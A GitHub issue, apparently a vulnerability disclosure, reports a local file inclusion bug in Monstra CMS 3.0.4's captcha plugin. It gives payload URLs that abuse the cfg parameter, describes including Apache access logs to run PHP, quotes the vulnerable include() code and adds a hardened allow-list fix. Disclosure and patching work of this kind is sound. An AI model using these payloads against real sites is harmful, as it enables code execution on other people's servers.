monstra-cms / monstra

THIS PROJECT IS NOT SUPPORTED ANYMORE! Check FLEXTYPE.ORG
http://flextype.org
MIT License

Monstra 3.0.4 Local File Inclusion Vulnerability #469

Open Zbadblog opened 3 years ago

Zbadblog commented 3 years ago

Brief of this vulnerability

There is a local file inclusion vulnerability in the CMS, which can be exploited by an attacker to execute PHP code.

Test Environment

Apache/2.4.39 (Windows10)
PHP 5.4.45-2+mysql 5.7.26

Affected version: <=3.0.4

payload

http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=filename

We can create phpinfo.txt in the web directory, with the content <?php phpinfo();?>


http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=I:\phpstudy_pro\www\phpinfo.txt


Or we can use Apache logs

  1. use burpsuite

  2. include log http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=I:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log

Reason of This Vulnerability

The value is taken directly from the GET parameter and passed to include, resulting in the vulnerability. Vulnerable file: plugins\captcha\crypt\cryptographp.inc.php

#..\plugins\captcha\crypt\cryptographp.inc.php
if (( ! isset($_COOKIE['cryptcookietest'])) and ($_GET[$_GET['sn']] == "")) {
    header("Content-type: image/png");
    readfile('images/erreur3.png');
    exit;
}

if ($_GET[$_GET['sn']] == "") { unset ($_GET['sn']); }

session_start();

// Takes only the configuration files in the same directory
// (the comment states the intent, but nothing below enforces it: $_GET['cfg'] is stored verbatim)
if ($_GET['cfg'] ) { $_SESSION['configfile']=$_GET['cfg']; } else {  $_SESSION['configfile'] = "cryptographp.cfg.php"; }

// user-controlled value reaches include() without any validation
include($_SESSION['configfile']);

As long as we assign a non-empty value to the sn variable, we can skip the first two if statements. The cfg variable is directly assigned to configfile, and then include is executed, resulting in the vulnerability.
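The snippet's own comment says only configuration files in the same directory are meant to be loadable, so the fix is to enforce exactly that before the value ever reaches include(). The following is an added example written for this issue, not code from Monstra or from the reporter; it assumes PHP 7 or later (the report's test environment is PHP 5.4, where the typed signatures and `??` would need rewriting), and the allow-list contents and the function name resolveConfigFile are assumptions for illustration, with only cryptographp.cfg.php taken from the issue text.

```php
<?php
// Added example (not Monstra's code): a hardened replacement for the
// cfg handling in cryptographp.inc.php. The configuration file must be
// chosen from a fixed allow-list of names that live next to this script;
// the raw query-string value is never passed to include().

declare(strict_types=1);

// Hypothetical allow-list of legitimate config file names shipped with the
// captcha plugin. Only 'cryptographp.cfg.php' is known from the issue text.
const ALLOWED_CONFIG_FILES = [
    'cryptographp.cfg.php',
];

/**
 * Resolve a user-supplied configuration file name to an absolute path
 * directly inside $baseDir, or return null if the name is not acceptable.
 * Callers must treat null as "do not include anything".
 */
function resolveConfigFile(?string $requested, string $baseDir): ?string
{
    // Default when no cfg parameter was supplied (matches the original default).
    $name = ($requested === null || $requested === '') ? 'cryptographp.cfg.php' : $requested;

    // First gate: the name must be one of the known files, compared strictly.
    // This alone rejects absolute paths, log files, and anything with separators.
    if (!in_array($name, ALLOWED_CONFIG_FILES, true)) {
        return null;
    }

    // Defence in depth: even an allow-listed name must resolve to a regular
    // file whose parent directory is exactly $baseDir (no symlink escape).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    if (dirname($path) !== $base) {
        return null;
    }
    return $path;
}

session_start();

$requested  = isset($_GET['cfg']) && is_string($_GET['cfg']) ? $_GET['cfg'] : null;
$configFile = resolveConfigFile($requested, __DIR__);

if ($configFile === null) {
    // Unknown or out-of-tree name: refuse, and do not echo the value back
    // into the response (which would just hand an attacker a reflection point).
    http_response_code(400);
    exit;
}

// Store only the vetted bare name in the session, never the raw request value.
$_SESSION['configfile'] = basename($configFile);
include $configFile;
```

The allow-list is the real control; the realpath() and dirname() checks exist so that a later edit which loosens the list (for example to accept any `*.cfg.php` name) still cannot be turned into a traversal. Requests that are rejected here are worth logging server-side with the offending cfg value, since a burst of them against cryptographp.inc.php is a clear signal of someone probing for this exact bug.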